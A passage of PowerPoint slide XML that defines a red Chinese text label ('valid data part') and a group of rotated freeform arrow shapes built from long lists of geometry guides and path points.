                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>有效数据部分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="202" name="Group 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BED25383-1FF5-8FD1-2BDF-67E36E088891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6388380" y="3988746"/>
            <a:ext cx="961317" cy="686440"/>
            <a:chOff x="4128" y="3444"/>
            <a:chExt cx="798" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="203" name="Group 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41FE1462-365A-F8A7-F21B-C83A89DF013E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="7488645">
              <a:off x="4283" y="3493"/>
              <a:ext cx="455" cy="477"/>
              <a:chOff x="2160" y="3312"/>
              <a:chExt cx="455" cy="477"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="205" name="Freeform 74">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37A01C8A-09B8-01E8-6247-9BABF9BEA972}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2312" y="3312"/>
                <a:ext cx="293" cy="369"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1464"/>
                  <a:gd name="T1" fmla="*/ 0 h 1849"/>
                  <a:gd name="T2" fmla="*/ 0 w 1464"/>
                  <a:gd name="T3" fmla="*/ 0 h 1849"/>
                  <a:gd name="T4" fmla="*/ 0 w 1464"/>
                  <a:gd name="T5" fmla="*/ 0 h 1849"/>
                  <a:gd name="T6" fmla="*/ 0 w 1464"/>
                  <a:gd name="T7" fmla="*/ 0 h 1849"/>
                  <a:gd name="T8" fmla="*/ 0 w 1464"/>
                  <a:gd name="T9" fmla="*/ 0 h 1849"/>
                  <a:gd name="T10" fmla="*/ 0 w 1464"/>
                  <a:gd name="T11" fmla="*/ 0 h 1849"/>
                  <a:gd name="T12" fmla="*/ 0 w 1464"/>
                  <a:gd name="T13" fmla="*/ 0 h 1849"/>
                  <a:gd name="T14" fmla="*/ 0 w 1464"/>
                  <a:gd name="T15" fmla="*/ 0 h 1849"/>
                  <a:gd name="T16" fmla="*/ 0 w 1464"/>
                  <a:gd name="T17" fmla="*/ 0 h 1849"/>
                  <a:gd name="T18" fmla="*/ 0 w 1464"/>
                  <a:gd name="T19" fmla="*/ 0 h 1849"/>
                  <a:gd name="T20" fmla="*/ 0 w 1464"/>
                  <a:gd name="T21" fmla="*/ 0 h 1849"/>
                  <a:gd name="T22" fmla="*/ 0 w 1464"/>
                  <a:gd name="T23" fmla="*/ 0 h 1849"/>
                  <a:gd name="T24" fmla="*/ 0 w 1464"/>
                  <a:gd name="T25" fmla="*/ 0 h 1849"/>
                  <a:gd name="T26" fmla="*/ 0 w 1464"/>
                  <a:gd name="T27" fmla="*/ 0 h 1849"/>
                  <a:gd name="T28" fmla="*/ 0 w 1464"/>
                  <a:gd name="T29" fmla="*/ 0 h 1849"/>
                  <a:gd name="T30" fmla="*/ 0 w 1464"/>
                  <a:gd name="T31" fmla="*/ 0 h 1849"/>
                  <a:gd name="T32" fmla="*/ 0 w 1464"/>
                  <a:gd name="T33" fmla="*/ 0 h 1849"/>
                  <a:gd name="T34" fmla="*/ 0 w 1464"/>
                  <a:gd name="T35" fmla="*/ 0 h 1849"/>
                  <a:gd name="T36" fmla="*/ 0 w 1464"/>
                  <a:gd name="T37" fmla="*/ 0 h 1849"/>
                  <a:gd name="T38" fmla="*/ 0 w 1464"/>
                  <a:gd name="T39" fmla="*/ 0 h 1849"/>
                  <a:gd name="T40" fmla="*/ 0 w 1464"/>
                  <a:gd name="T41" fmla="*/ 0 h 1849"/>
                  <a:gd name="T42" fmla="*/ 0 w 1464"/>
                  <a:gd name="T43" fmla="*/ 0 h 1849"/>
                  <a:gd name="T44" fmla="*/ 0 w 1464"/>
                  <a:gd name="T45" fmla="*/ 0 h 1849"/>
                  <a:gd name="T46" fmla="*/ 0 w 1464"/>
                  <a:gd name="T47" fmla="*/ 0 h 1849"/>
                  <a:gd name="T48" fmla="*/ 0 w 1464"/>
                  <a:gd name="T49" fmla="*/ 0 h 1849"/>
                  <a:gd name="T50" fmla="*/ 0 w 1464"/>
                  <a:gd name="T51" fmla="*/ 0 h 1849"/>
                  <a:gd name="T52" fmla="*/ 0 w 1464"/>
                  <a:gd name="T53" fmla="*/ 0 h 1849"/>
                  <a:gd name="T54" fmla="*/ 0 w 1464"/>
                  <a:gd name="T55" fmla="*/ 0 h 1849"/>
                  <a:gd name="T56" fmla="*/ 0 w 1464"/>
                  <a:gd name="T57" fmla="*/ 0 h 1849"/>
                  <a:gd name="T58" fmla="*/ 0 w 1464"/>
                  <a:gd name="T59" fmla="*/ 0 h 1849"/>
                  <a:gd name="T60" fmla="*/ 0 w 1464"/>
                  <a:gd name="T61" fmla="*/ 0 h 1849"/>
                  <a:gd name="T62" fmla="*/ 0 w 1464"/>
                  <a:gd name="T63" fmla="*/ 0 h 1849"/>
                  <a:gd name="T64" fmla="*/ 0 w 1464"/>
                  <a:gd name="T65" fmla="*/ 0 h 1849"/>
                  <a:gd name="T66" fmla="*/ 0 w 1464"/>
                  <a:gd name="T67" fmla="*/ 0 h 1849"/>
                  <a:gd name="T68" fmla="*/ 0 w 1464"/>
                  <a:gd name="T69" fmla="*/ 0 h 1849"/>
                  <a:gd name="T70" fmla="*/ 0 w 1464"/>
                  <a:gd name="T71" fmla="*/ 0 h 1849"/>
                  <a:gd name="T72" fmla="*/ 0 w 1464"/>
                  <a:gd name="T73" fmla="*/ 0 h 1849"/>
                  <a:gd name="T74" fmla="*/ 0 w 1464"/>
                  <a:gd name="T75" fmla="*/ 0 h 1849"/>
                  <a:gd name="T76" fmla="*/ 0 w 1464"/>
                  <a:gd name="T77" fmla="*/ 0 h 1849"/>
                  <a:gd name="T78" fmla="*/ 0 w 1464"/>
                  <a:gd name="T79" fmla="*/ 0 h 1849"/>
                  <a:gd name="T80" fmla="*/ 0 w 1464"/>
                  <a:gd name="T81" fmla="*/ 0 h 1849"/>
                  <a:gd name="T82" fmla="*/ 0 w 1464"/>
                  <a:gd name="T83" fmla="*/ 0 h 1849"/>
                  <a:gd name="T84" fmla="*/ 0 w 1464"/>
                  <a:gd name="T85" fmla="*/ 0 h 1849"/>
                  <a:gd name="T86" fmla="*/ 0 w 1464"/>
                  <a:gd name="T87" fmla="*/ 0 h 1849"/>
                  <a:gd name="T88" fmla="*/ 0 w 1464"/>
                  <a:gd name="T89" fmla="*/ 0 h 1849"/>
                  <a:gd name="T90" fmla="*/ 0 w 1464"/>
                  <a:gd name="T91" fmla="*/ 0 h 1849"/>
                  <a:gd name="T92" fmla="*/ 0 w 1464"/>
                  <a:gd name="T93" fmla="*/ 0 h 1849"/>
                  <a:gd name="T94" fmla="*/ 0 w 1464"/>
                  <a:gd name="T95" fmla="*/ 0 h 1849"/>
                  <a:gd name="T96" fmla="*/ 0 w 1464"/>
                  <a:gd name="T97" fmla="*/ 0 h 1849"/>
                  <a:gd name="T98" fmla="*/ 0 w 1464"/>
                  <a:gd name="T99" fmla="*/ 0 h 1849"/>
                  <a:gd name="T100" fmla="*/ 0 w 1464"/>
                  <a:gd name="T101" fmla="*/ 0 h 1849"/>
                  <a:gd name="T102" fmla="*/ 0 w 1464"/>
                  <a:gd name="T103" fmla="*/ 0 h 18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4"/>
                  <a:gd name="T157" fmla="*/ 0 h 1849"/>
                  <a:gd name="T158" fmla="*/ 1464 w 1464"/>
                  <a:gd name="T159" fmla="*/ 1849 h 18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4" h="1849">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7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1049" y="459"/>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5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="1316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="1366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="1413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="1458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="1505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1437" y="1553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="1604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1407" y="1658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1390" y="1707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1371" y="1755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="1802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="1849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="1599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="908" y="1552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="924" y="1516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="1477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="945" y="1439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="1404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="954" y="1369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="1336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="1300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="955" y="1259"/>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206" name="Freeform 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6A208E1-ABCC-9183-EE91-57A38FEBED58}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2227" y="3584"/>
                <a:ext cx="388" cy="205"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1942"/>
                  <a:gd name="T1" fmla="*/ 0 h 1028"/>
                  <a:gd name="T2" fmla="*/ 0 w 1942"/>
                  <a:gd name="T3" fmla="*/ 0 h 1028"/>
                  <a:gd name="T4" fmla="*/ 0 w 1942"/>
                  <a:gd name="T5" fmla="*/ 0 h 1028"/>
                  <a:gd name="T6" fmla="*/ 0 w 1942"/>
                  <a:gd name="T7" fmla="*/ 0 h 1028"/>
                  <a:gd name="T8" fmla="*/ 0 w 1942"/>
                  <a:gd name="T9" fmla="*/ 0 h 1028"/>
                  <a:gd name="T10" fmla="*/ 0 w 1942"/>
                  <a:gd name="T11" fmla="*/ 0 h 1028"/>
                  <a:gd name="T12" fmla="*/ 0 w 1942"/>
                  <a:gd name="T13" fmla="*/ 0 h 1028"/>
                  <a:gd name="T14" fmla="*/ 0 w 1942"/>
                  <a:gd name="T15" fmla="*/ 0 h 1028"/>
                  <a:gd name="T16" fmla="*/ 0 w 1942"/>
                  <a:gd name="T17" fmla="*/ 0 h 1028"/>
                  <a:gd name="T18" fmla="*/ 0 w 1942"/>
                  <a:gd name="T19" fmla="*/ 0 h 1028"/>
                  <a:gd name="T20" fmla="*/ 0 w 1942"/>
                  <a:gd name="T21" fmla="*/ 0 h 1028"/>
                  <a:gd name="T22" fmla="*/ 0 w 1942"/>
                  <a:gd name="T23" fmla="*/ 0 h 1028"/>
                  <a:gd name="T24" fmla="*/ 0 w 1942"/>
                  <a:gd name="T25" fmla="*/ 0 h 1028"/>
                  <a:gd name="T26" fmla="*/ 0 w 1942"/>
                  <a:gd name="T27" fmla="*/ 0 h 1028"/>
                  <a:gd name="T28" fmla="*/ 0 w 1942"/>
                  <a:gd name="T29" fmla="*/ 0 h 1028"/>
                  <a:gd name="T30" fmla="*/ 0 w 1942"/>
                  <a:gd name="T31" fmla="*/ 0 h 1028"/>
                  <a:gd name="T32" fmla="*/ 0 w 1942"/>
                  <a:gd name="T33" fmla="*/ 0 h 1028"/>
                  <a:gd name="T34" fmla="*/ 0 w 1942"/>
                  <a:gd name="T35" fmla="*/ 0 h 1028"/>
                  <a:gd name="T36" fmla="*/ 0 w 1942"/>
                  <a:gd name="T37" fmla="*/ 0 h 1028"/>
                  <a:gd name="T38" fmla="*/ 0 w 1942"/>
                  <a:gd name="T39" fmla="*/ 0 h 1028"/>
                  <a:gd name="T40" fmla="*/ 0 w 1942"/>
                  <a:gd name="T41" fmla="*/ 0 h 1028"/>
                  <a:gd name="T42" fmla="*/ 0 w 1942"/>
                  <a:gd name="T43" fmla="*/ 0 h 1028"/>
                  <a:gd name="T44" fmla="*/ 0 w 1942"/>
                  <a:gd name="T45" fmla="*/ 0 h 1028"/>
                  <a:gd name="T46" fmla="*/ 0 w 1942"/>
                  <a:gd name="T47" fmla="*/ 0 h 1028"/>
                  <a:gd name="T48" fmla="*/ 0 w 1942"/>
                  <a:gd name="T49" fmla="*/ 0 h 1028"/>
                  <a:gd name="T50" fmla="*/ 0 w 1942"/>
                  <a:gd name="T51" fmla="*/ 0 h 1028"/>
                  <a:gd name="T52" fmla="*/ 0 w 1942"/>
                  <a:gd name="T53" fmla="*/ 0 h 1028"/>
                  <a:gd name="T54" fmla="*/ 0 w 1942"/>
                  <a:gd name="T55" fmla="*/ 0 h 1028"/>
                  <a:gd name="T56" fmla="*/ 0 w 1942"/>
                  <a:gd name="T57" fmla="*/ 0 h 1028"/>
                  <a:gd name="T58" fmla="*/ 0 w 1942"/>
                  <a:gd name="T59" fmla="*/ 0 h 1028"/>
                  <a:gd name="T60" fmla="*/ 0 w 1942"/>
                  <a:gd name="T61" fmla="*/ 0 h 1028"/>
                  <a:gd name="T62" fmla="*/ 0 w 1942"/>
                  <a:gd name="T63" fmla="*/ 0 h 1028"/>
                  <a:gd name="T64" fmla="*/ 0 w 1942"/>
                  <a:gd name="T65" fmla="*/ 0 h 1028"/>
                  <a:gd name="T66" fmla="*/ 0 w 1942"/>
                  <a:gd name="T67" fmla="*/ 0 h 1028"/>
                  <a:gd name="T68" fmla="*/ 0 w 1942"/>
                  <a:gd name="T69" fmla="*/ 0 h 1028"/>
                  <a:gd name="T70" fmla="*/ 0 w 1942"/>
                  <a:gd name="T71" fmla="*/ 0 h 1028"/>
                  <a:gd name="T72" fmla="*/ 0 w 1942"/>
                  <a:gd name="T73" fmla="*/ 0 h 1028"/>
                  <a:gd name="T74" fmla="*/ 0 w 1942"/>
                  <a:gd name="T75" fmla="*/ 0 h 1028"/>
                  <a:gd name="T76" fmla="*/ 0 w 1942"/>
                  <a:gd name="T77" fmla="*/ 0 h 1028"/>
                  <a:gd name="T78" fmla="*/ 0 w 1942"/>
                  <a:gd name="T79" fmla="*/ 0 h 1028"/>
                  <a:gd name="T80" fmla="*/ 0 w 1942"/>
                  <a:gd name="T81" fmla="*/ 0 h 1028"/>
                  <a:gd name="T82" fmla="*/ 0 w 1942"/>
                  <a:gd name="T83" fmla="*/ 0 h 1028"/>
                  <a:gd name="T84" fmla="*/ 0 w 1942"/>
                  <a:gd name="T85" fmla="*/ 0 h 1028"/>
                  <a:gd name="T86" fmla="*/ 0 w 1942"/>
                  <a:gd name="T87" fmla="*/ 0 h 1028"/>
                  <a:gd name="T88" fmla="*/ 0 w 1942"/>
                  <a:gd name="T89" fmla="*/ 0 h 1028"/>
                  <a:gd name="T90" fmla="*/ 0 w 1942"/>
                  <a:gd name="T91" fmla="*/ 0 h 1028"/>
                  <a:gd name="T92" fmla="*/ 0 w 1942"/>
                  <a:gd name="T93" fmla="*/ 0 h 1028"/>
                  <a:gd name="T94" fmla="*/ 0 w 1942"/>
                  <a:gd name="T95" fmla="*/ 0 h 1028"/>
                  <a:gd name="T96" fmla="*/ 0 w 1942"/>
                  <a:gd name="T97" fmla="*/ 0 h 1028"/>
                  <a:gd name="T98" fmla="*/ 0 w 1942"/>
                  <a:gd name="T99" fmla="*/ 0 h 10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42"/>
                  <a:gd name="T151" fmla="*/ 0 h 1028"/>
                  <a:gd name="T152" fmla="*/ 1942 w 1942"/>
                  <a:gd name="T153" fmla="*/ 1028 h 10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42" h="1028">
                    <a:moveTo>
                      <a:pt x="976" y="1015"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="996" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="1007"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1049" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="997"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1091" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1113" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1135" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1177" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1205" y="954"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1229" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1251" y="934"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1277" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1301" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1323" y="899"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="885"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1362" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1381" y="861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1402" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="833"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1467" y="802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="763"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1544" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1600" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1620" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1643" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1667" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1688" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1708" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1733" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1942" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1737" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1073" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1297" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1278" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1258" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1238" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1201" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1114" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1092" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1073" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1045" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="999" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="977" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="945" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="880" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="649"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="804"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="840"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="891"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="906"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="934"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="947"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="989"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="997"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="1004"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="1026"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="884" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="918" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="949" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="976" y="10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207" name="Freeform 76">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C8833F6-36E1-04EF-4C3C-1A00E4867034}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2160" y="3361"/>
                <a:ext cx="197" cy="367"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 985"/>
                  <a:gd name="T1" fmla="*/ 0 h 1832"/>
                  <a:gd name="T2" fmla="*/ 0 w 985"/>
                  <a:gd name="T3" fmla="*/ 0 h 1832"/>
                  <a:gd name="T4" fmla="*/ 0 w 985"/>
                  <a:gd name="T5" fmla="*/ 0 h 1832"/>
                  <a:gd name="T6" fmla="*/ 0 w 985"/>
                  <a:gd name="T7" fmla="*/ 0 h 1832"/>
                  <a:gd name="T8" fmla="*/ 0 w 985"/>
                  <a:gd name="T9" fmla="*/ 0 h 1832"/>
                  <a:gd name="T10" fmla="*/ 0 w 985"/>
                  <a:gd name="T11" fmla="*/ 0 h 1832"/>
                  <a:gd name="T12" fmla="*/ 0 w 985"/>
                  <a:gd name="T13" fmla="*/ 0 h 1832"/>
                  <a:gd name="T14" fmla="*/ 0 w 985"/>
                  <a:gd name="T15" fmla="*/ 0 h 1832"/>
                  <a:gd name="T16" fmla="*/ 0 w 985"/>
                  <a:gd name="T17" fmla="*/ 0 h 1832"/>
                  <a:gd name="T18" fmla="*/ 0 w 985"/>
                  <a:gd name="T19" fmla="*/ 0 h 1832"/>
                  <a:gd name="T20" fmla="*/ 0 w 985"/>
                  <a:gd name="T21" fmla="*/ 0 h 1832"/>
                  <a:gd name="T22" fmla="*/ 0 w 985"/>
                  <a:gd name="T23" fmla="*/ 0 h 1832"/>
                  <a:gd name="T24" fmla="*/ 0 w 985"/>
                  <a:gd name="T25" fmla="*/ 0 h 1832"/>
                  <a:gd name="T26" fmla="*/ 0 w 985"/>
                  <a:gd name="T27" fmla="*/ 0 h 1832"/>
                  <a:gd name="T28" fmla="*/ 0 w 985"/>
                  <a:gd name="T29" fmla="*/ 0 h 1832"/>
                  <a:gd name="T30" fmla="*/ 0 w 985"/>
                  <a:gd name="T31" fmla="*/ 0 h 1832"/>
                  <a:gd name="T32" fmla="*/ 0 w 985"/>
                  <a:gd name="T33" fmla="*/ 0 h 1832"/>
                  <a:gd name="T34" fmla="*/ 0 w 985"/>
                  <a:gd name="T35" fmla="*/ 0 h 1832"/>
                  <a:gd name="T36" fmla="*/ 0 w 985"/>
                  <a:gd name="T37" fmla="*/ 0 h 1832"/>
                  <a:gd name="T38" fmla="*/ 0 w 985"/>
                  <a:gd name="T39" fmla="*/ 0 h 1832"/>
                  <a:gd name="T40" fmla="*/ 0 w 985"/>
                  <a:gd name="T41" fmla="*/ 0 h 1832"/>
                  <a:gd name="T42" fmla="*/ 0 w 985"/>
                  <a:gd name="T43" fmla="*/ 0 h 1832"/>
                  <a:gd name="T44" fmla="*/ 0 w 985"/>
                  <a:gd name="T45" fmla="*/ 0 h 1832"/>
                  <a:gd name="T46" fmla="*/ 0 w 985"/>
                  <a:gd name="T47" fmla="*/ 0 h 1832"/>
                  <a:gd name="T48" fmla="*/ 0 w 985"/>
                  <a:gd name="T49" fmla="*/ 0 h 1832"/>
                  <a:gd name="T50" fmla="*/ 0 w 985"/>
                  <a:gd name="T51" fmla="*/ 0 h 1832"/>
